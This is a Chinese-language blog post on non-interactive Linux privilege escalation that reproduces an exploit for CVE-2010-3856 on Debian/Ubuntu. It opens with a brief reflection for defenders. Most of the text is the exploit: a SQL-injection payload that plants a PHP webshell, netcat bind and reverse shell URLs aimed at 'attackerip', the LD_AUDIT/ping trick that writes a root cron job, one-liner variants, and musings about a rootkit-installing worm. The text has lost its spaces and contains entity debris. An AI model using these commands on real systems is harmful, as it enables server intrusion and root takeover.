linux非交互环境下本地提权与反思

在iptables限制非常严格的时候，无法走icmpudptcp的bindshell或connectbackshell，又需要本地提权，root了之后关闭iptables，看看能否绕过访问控制手段（当然了，如果别人是硬件的防火墙，下文解决不了问题）。在这一场景下，可以考虑参考下文的非交互式本地提权的方法，或许还有其他linuxlocalrootexploit也能实现，实战出真知。

另外有些时候不一定非得root的，nobody，非交互也能做非常多的事。


作为防御一方，面对这种场景，我们是否得反思

1、防御手段要与被防御系统分离，即使成功root了，依然难以快速渗透

2、我们对localroot是否有足够的事前的免疫能力，事中的发现能力及事后的定损取证能力？
Debian<=5.0.6/Ubuntu<=10.04Webshell-Remote-Root

#ExploitTitle:Debian<=5.0.6/Ubuntu<=10.04Webshell-Remote-Root#Date:24-10-2010#Author:jmit#Mail:fhausberger[at]gmail[dot]com#Testedon:Debian5.0.6#CVE:CVE-2010-3856


&mdash;&mdash;&mdash;&mdash;&ndash;|DISCLAIMER|&mdash;&mdash;&mdash;&mdash;&ndash;

#INNOEVENTSHALLTHECOPYRIGHTOWNERORCONTRIBUTORSBE#LIABLEFORANYDIRECT,INDIRECT,INCIDENTAL,SPECIAL,EXEMPLARY,OR#CONSEQUENTIALDAMAGES(INCLUDING,BUTNOTLIMITEDTO,PROCUREMENTOF#SUBSTITUTEGOODSORSERVICES;LOSSOFUSE,DATA,ORPROFITS;ORBUSINESS#INTERRUPTION)HOWEVERCAUSEDANDONANYTHEORYOFLIABILITY,WHETHERIN#CONTRACT,STRICTLIABILITY,ORTORT(INCLUDINGNEGLIGENCEOROTHERWISE)#ARISINGINANYWAYOUTOFTHEUSEOFTHISSOFTWARE,EVENIFADVISEDOFTHE#POSSIBILITYOFSUCHDAMAGE.


&mdash;&mdash;&mdash;|ABOUT|&mdash;&mdash;&mdash;

Debian/Ubunturemoterootexploitationexample(GNUdynamiclinkerDSOvuln).See(http://www.exploit-db.com/exploits/15304/).Shouldworkonotherlinuxdistrostoo.


&mdash;&mdash;&mdash;&mdash;&ndash;|BACKGROUND|&mdash;&mdash;&mdash;&mdash;&ndash;

Typicallyitisn&rsquo;tpossibletouseasuidshellormodify/etc/passwddirectlyafterwebshellaccess(usernobody)togainrootaccess.ButwiththeDSOvulnwecanlaunchcommandsasrootandwecancreateasocketandconnecttotheuserorsetupabindshell.


&mdash;&mdash;&mdash;&ndash;|EXPLOIT|&mdash;&mdash;&mdash;&ndash;

AfteryouhavefoundaSQL-Injectionvulnyoucancreateaphpbackdoor.Thisistypicallypossiblewithselectintodumpfile/outfilestatement.Thevaluesareasimple<?passthru($_GET['c']);?>backdoor.

&mdash;DROPTABLEIFEXISTS`fm`;CREATETABLE`fm`(`fm`longblob)TYPE=MyISAM;insertintofm(fm)values(0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);selectfmfromfmintodumpfile&lsquo;/opt/lampp/htdocs/xampp_backup.php&rsquo;;droptablefm;flushlogs;&mdash;

Nowyoucanconnecttotheserverandcreateaconnectionwithtelnet,nc,writebinarywithperl-e&lsquo;print&ldquo;\x41\x42\x43\x44&rime;&lsquo;,echo-en&lsquo;\x41\x42\x43\x44&prime;,&hellip;Ifdirectshellaccessisn&rsquo;tpossibleyoucanusephpcodetocreateyourownbinarywithphpfwrite:

&mdash;<?php$File=&ldquo;/tmp/nc&rdquo;;$Handle=fopen($File,&lsquo;w&rsquo;);$Data=&ldquo;\x41\x42\x43\x44&rime;;fwrite($Handle,$Data);fclose($Handle);?>&mdash;

Nowuse

Bind-Shell:http://victimip/xampp_backup.php?c=nc-l-p9999-e/bin/bashReverse-Shell:http://victimip/xampp_backup.php?c=/bin/ncattackerip9999|/bin/bash

inyourwebbrowserandconnecttoyourshell

$ncvictimip9999iduid=65534(nobody)gid=65534(nogroup)groups=65534(nogroup)

&mdash;

NowletsexploittheDSOvuln.Youneedumask0forcorrectrw-rw-rwcreationofexploit/etc/cron.d/exploit

$umask0

Thisistheshellscriptforthecron.dentry.

Bind-Shellecho-e&lsquo;/bin/nc-l-p79-e/bin/bash&rsquo;>/tmp/exploit.shReverse-Shellecho-e&lsquo;/bin/nclocalhost8888|/bin/bash&rsquo;>/tmp/exploit.sh

Nowmakeyourshellscriptexecutableforcron:

$chmodu+x/tmp/exploit.sh

Createrw-rw-rwfileincrondirectoryusingthesetuidpingprogram:

$LD_AUDIT=&rdquo;libpcprofile.so&rdquoCPROFILE_OUTPUT=&rdquo;/etc/cron.d/exploit&rdquo;ping

Launcheveryminuteasuidrootshell

$echo-e&lsquo;*/1****root/tmp/exploit.sh&rsquo;>/etc/cron.d/exploit

Nowyouhavearootshelleveryminute.

$ncattackerip79iduid=0(root)gid=0(root)groups=0(root)


&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-|EXPLOIToneline|&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-

echo-e&lsquo;/bin/nc-l-p79-e/bin/bash&rsquo;>/tmp/exploit.sh;/bin/chmod0744/tmp/exploit.sh;umask0;LD_AUDIT=&rdquo;libpcprofile.so&rdquoCPROFILE_OUTPUT=&rdquo;/etc/cron.d/exploit&rdquo;ping;echo-e&lsquo;*/1****root/tmp/exploit.sh&rsquo;>/etc/cron.d/exploit

$ncattackerip79iduid=0(root)gid=0(root)groups=0(root)


&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;|EXPLOITfromwebshellonly|&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;

http://victimip/xampp_backup.php?c=echo-e&lsquo;/bin/nc-l-p79-e/bin/bash&rsquo;>/tmp/exploit.shhttp://victimip/xampp_backup.php?c=/bin/chmod0744/tmp/exploit.shhttp://victimip/xampp_backup.php?c=umask0;LD_AUDIT=&rdquo;libpcprofile.so&rdquoCPROFILE_OUTPUT=&rdquo;/etc/cron.d/exploit&rdquo;pinghttp://victimip/xampp_backup.php?c=echo-e&lsquo;*/1****root/tmp/exploit.sh&rsquo;>/etc/cron.d/exploit

$ncattackerip79iduid=0(root)gid=0(root)groups=0(root)


&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;|EXPLOITfromwebshelloneline|&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;

http://victimip/xampp_backup.php?c=echo-e&lsquo;/bin/nc-l-p79-e/bin/bash&rsquo;>/tmp/exploit.sh;/bin/chmod0744/tmp/exploit.sh;umask0;LD_AUDIT=&rdquo;libpcprofile.so&rdquoCPROFILE_OUTPUT=&rdquo;/etc/cron.d/exploit&rdquo;ping;echo-e&lsquo;*/1****root/tmp/exploit.sh&rsquo;>/etc/cron.d/exploit

$ncattackerip79iduid=0(root)gid=0(root)groups=0(root)


&mdash;&mdash;&mdash;|IDEAS|&mdash;&mdash;&mdash;

Lookslikeawormablebug.Theurlobfuscated(IDS/IPS)wormsearchforSQLI/BSQLIbugsorremotecodeexecutionbugs.Thentheworminjectstheevilurlanddothesameforotherips.Itinstallsarootkit-botandthegameisover.&copy;OffensiveSecurity2010
&nbsp;
*
*